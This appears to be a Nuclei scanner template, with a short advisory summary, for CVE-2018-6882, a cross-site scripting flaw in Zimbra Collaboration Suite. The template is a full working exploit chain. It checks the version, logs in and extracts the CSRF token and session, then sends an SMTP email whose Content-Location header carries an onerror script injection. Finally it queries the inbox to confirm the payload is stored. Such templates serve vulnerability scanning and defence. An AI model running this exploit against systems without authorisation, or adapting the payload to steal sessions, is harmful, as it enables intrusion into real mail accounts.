Cross-site scripting (XSS) vulnerability in the ZmMailMsgView.getAttachmentLinkHtml function in Zimbra Collaboration Suite (ZCS) before 8.7 Patch 1 and 8.8.x before 8.8.7 might allow remote attackers to inject arbitrary web script or HTML via a Content-Location header in an email attachment.
PoC代码[已公开]
id: CVE-2018-6882
info:
name: Zimbra Collaboration Suite - Cross-site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in the ZmMailMsgView.getAttachmentLinkHtml function in Zimbra Collaboration Suite (ZCS) before 8.7 Patch 1 and 8.8.x before 8.8.7 might allow remote attackers to inject arbitrary web script or HTML via a Content-Location header in an email attachment.
reference:
- https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-6882
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.8
cve-id: CVE-2018-6882
epss-score: 0.63278
epss-percentile: 0.98304
cwe-id: CWE-79
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: zimbra
product: collaboration_server
tags: cve,cve2018,smtp,zimbra,collaboration-server,intrusive,xss,kev,vkev
flow: http(1) && tcp(1) && http(2) && http(3)
variables:
mail: "{{mail}}"
pass: "{{pass}}"
user: "{{user}}"
base: "{{interactsh-url}}"
http:
- raw:
- |
GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
name: version
regex:
- 'CLIENT_VERSION",\s*\{[^}]*defaultValue:"(?:8\.7\.(?:0|5|11)|8\.8\.(?:0|6))(?:_GA_[0-9]+)?"'
part: body
- type: dsl
name: zimbra-detect
condition: and
dsl:
- 'status_code == 200'
- 'contains(body, "Zimbra Collaboration Suite")'
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: ZM_TEST=true
loginOp=login&username={{user}}&password={{pass}}&client=preferred
redirects: true
extractors:
- type: regex
name: csrf
part: body
regex:
- 'window\.csrfToken\s*=\s*"([^"]+)"'
internal: true
group: 1
- type: regex
name: session
part: body
regex:
- '"session":\s*\{"id":"([0-9]+)"'
internal: true
group: 1
cookie-reuse: true
- raw:
- |
POST /service/soap/SearchConvRequest HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml; charset=UTF-8
X-Zimbra-Csrf-Token: {{csrf}}
{"Header":{"context":{"_jsns":"urn:zimbra","userAgent":{"name":"ZimbraWebClient - FF128 (Linux)","version":"8.7.11_GA_1854"},"session":{"_content":"{{session}}","id":{{session}}},"account":{"_content":"{{mail}}","by":"name"},"csrfToken":"{{csrf}}"}},"Body":{"SearchConvRequest":{"_jsns":"urn:zimbraMail","sortBy":"dateDesc","header":[{"n":"List-ID"},{"n":"X-Zimbra-DL"},{"n":"IN-REPLY-TO"}],"tz":{"id":"Asia/Kolkata"},"locale":{"_content":"en_US"},"offset":0,"limit":250,"query":"in:inbox","cid":"-257","fetch":"u!","html":1,"needExp":1,"max":250000,"recip":"2"}}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "onerror=alert(document.domain)")'
- 'contains(content_type, "text/javascript")'
condition: and
tcp:
- host:
- "{{Hostname}}"
port: 25
inputs:
- read: 1024
- data: "EHLO {{base}}\r\n"
read: 1024
- data: "MAIL FROM:<{{mail}}>\r\n"
read: 1024
- data: "RCPT TO:<{{mail}}>\r\n"
read: 1024
- data: "DATA\r\n"
read: 1024
- data: |
From: {{mail}}
To: {{mail}}
Subject: Test Subject
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY_12345"
--BOUNDARY_12345
Content-Type: text/plain; charset="utf-8"
Check the attachment
--BOUNDARY_12345
Content-Type: text/plain; name="attachment.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="attachment.txt"
Content-Location: http://foo.bar'></a><img src=a onerror=alert(document.domain)>
YXR0YWNobWVudAo=
--BOUNDARY_12345--
.
read: 1024
- data: "QUIT\r\n"
read: 1024
# digest: 490a00463044022041805ab3c5c7902f3738646d8b2ea2c4254b1b8d1bd3fbcd8dd17db5be6d5f1d022068366ce011bde13a7378fd4bbda562c99f737f0846d6c7dcd490c23fe110f000:922c64590222798bb761d5b6d8e72950